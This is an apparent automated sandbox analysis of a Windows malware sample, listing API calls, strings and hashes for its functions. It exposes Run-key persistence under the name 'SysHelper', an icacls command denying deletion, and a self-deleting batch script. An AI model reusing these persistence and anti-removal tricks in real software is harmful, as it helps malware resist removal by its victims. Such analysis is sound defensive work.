                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                  • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                  • _memset.LIBCMT ref: 004110CA
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                  • _malloc.LIBCMT ref: 00411100
                                                                                                  • _memset.LIBCMT ref: 0041110B
                                                                                                  • _sprintf.LIBCMT ref: 0041112E
                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 2451520719-213608013
                                                                                                  • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                  • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                  • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                  • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                  • _memset.LIBCMT ref: 0040E98E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                  • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1084002244-213608013
                                                                                                  • Opcode ID: e751219a71e2b7e2c83dd52f72c8bfe88636bf0333f1cf93ebe6a8a84750a1e8
                                                                                                  • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                  • Opcode Fuzzy Hash: e751219a71e2b7e2c83dd52f72c8bfe88636bf0333f1cf93ebe6a8a84750a1e8
                                                                                                  • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                  • _memset.LIBCMT ref: 0040EBB4
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                  • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 1637485200-213608013
                                                                                                  • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                  • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0040E67F
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: HeapAlloc.KERNEL32(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _malloc.LIBCMT ref: 0040E68B
                                                                                                  • _wprintf.LIBCMT ref: 0040E69E
                                                                                                  • _free.LIBCMT ref: 0040E6A4
                                                                                                    • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                  • _free.LIBCMT ref: 0040E6C5
                                                                                                  • _malloc.LIBCMT ref: 0040E6CD
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                  • _sprintf.LIBCMT ref: 0040E720
                                                                                                  • _wprintf.LIBCMT ref: 0040E732
                                                                                                  • _wprintf.LIBCMT ref: 0040E73C
                                                                                                  • _free.LIBCMT ref: 0040E745
                                                                                                  Strings
                                                                                                  • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                  • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                  • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocErrorFreeLast_sprintf
                                                                                                  • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                  • API String ID: 473631332-1604013687
                                                                                                  • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                  • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3232302685-0
                                                                                                  • Opcode ID: 2936c85e8f885e92035f2aef14cfadfed421b87f0d385f1becd02d4e5c78b91b
                                                                                                  • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                                                                                                  • Opcode Fuzzy Hash: 2936c85e8f885e92035f2aef14cfadfed421b87f0d385f1becd02d4e5c78b91b
                                                                                                  • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004382A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                  • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                  • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                  • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                  • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wassert
                                                                                                  • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                  • API String ID: 3993402318-1975116136
                                                                                                  • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                  • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                  • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                  • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1250 411cd0-411d1a call 42f7c0 RegOpenKeyExW 1253 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 1250->1253 1254 412207-412216 1250->1254 1257 411d93-411d9c 1253->1257 1258 411d8f-411d91 1253->1258 1260 411da0-411da9 1257->1260 1259 411daf-411dcb call 415c10 1258->1259 1264 411dd1-411df8 lstrlenA call 413520 1259->1264 1265 411e7c-411e87 1259->1265 1260->1260 1261 411dab-411dad 1260->1261 1261->1259 1271 411e28-411e2c 1264->1271 1272 411dfa-411dfe 1264->1272 1267 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1265->1267 1268 411e89-411e91 call 422587 1265->1268 1279 411f36-411f38 1267->1279 1280 411f3a-411f3f 1267->1280 1268->1267 1277 411e3c-411e50 PathFileExistsW 1271->1277 1278 411e2e-411e39 call 422587 1271->1278 1275 411e00-411e08 call 422587 1272->1275 1276 411e0b-411e23 call 4145a0 1272->1276 1275->1276 1276->1271 1277->1265 1286 411e52-411e57 1277->1286 1278->1277 1284 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 1279->1284 1285 411f40-411f49 1280->1285 1297 411f98-411fa0 1284->1297 1298 411fce-411fe9 1284->1298 1285->1285 1292 411f4b-411f4d 1285->1292 1287 411e59-411e5e 1286->1287 1288 411e6a-411e6e 1286->1288 1287->1288 1293 411e60-411e65 call 414690 1287->1293 1288->1254 1295 411e74-411e77 1288->1295 1292->1284 1293->1288 1299 4121ff-412204 call 422587 1295->1299 1300 411fa2-411fa4 1297->1300 1301 411fa6-411faf 1297->1301 1303 411feb-411fed 1298->1303 1304 411fef-411ff8 1298->1304 1299->1254 1305 411fbf-411fc9 call 415c10 1300->1305 1307 411fb0-411fb9 1301->1307 1308 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1303->1308 1309 412000-412009 1304->1309 1305->1298 1307->1307 1311 411fbb-411fbd 1307->1311 1315 4121d1-4121d5 1308->1315 1316 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1308->1316 1309->1309 1313 41200b-41200d 1309->1313 1311->1305 1313->1308 1318 4121e2-4121fa 1315->1318 1319 4121d7-4121df call 422587 1315->1319 1324 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1316->1324 1325 412109-412110 call 413260 1316->1325 1318->1254 1320 4121fc 1318->1320 1319->1318 1320->1299 1329 4121b2-4121b8 1324->1329 1330 4121aa-4121b0 GetLastError 1324->1330 1325->1324 1331 4121c0-4121cf WaitForSingleObject 1329->1331 1330->1315 1331->1315 1331->1331
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                  • _memset.LIBCMT ref: 00411D3B
                                                                                                  • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                  • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                                                                                  • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                  • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                  • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                  • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                  • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                  • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                  • _memset.LIBCMT ref: 00412090
                                                                                                  • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                  • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                  • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                  • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                  • _memset.LIBCMT ref: 00412120
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                  • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                  • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                  • API String ID: 2589766509-1182136429
                                                                                                  • Opcode ID: 2830f4d22bb4cc6c66c95b42a458652ef167f5d2173bbe45734798a70efe51a0
                                                                                                  • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                  • Opcode Fuzzy Hash: 2830f4d22bb4cc6c66c95b42a458652ef167f5d2173bbe45734798a70efe51a0
                                                                                                  • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                  • GetLastError.KERNEL32 ref: 00412509
                                                                                                  • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                  • CloseHandle.KERNEL32 ref: 00412539
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                  • GetLastError.KERNEL32 ref: 0041255B
                                                                                                  • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                  • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                  • API String ID: 2372642624-488272950
                                                                                                  • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                  • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                  • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                  • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32 ref: 00411915
                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                                                                                  • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                  • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                  • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                  • _memset.LIBCMT ref: 004119B8
                                                                                                  • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                    • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                  • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                  • String ID: failed with error
                                                                                                  • API String ID: 4182478520-946485432
                                                                                                  • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                  • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                  • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                  • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
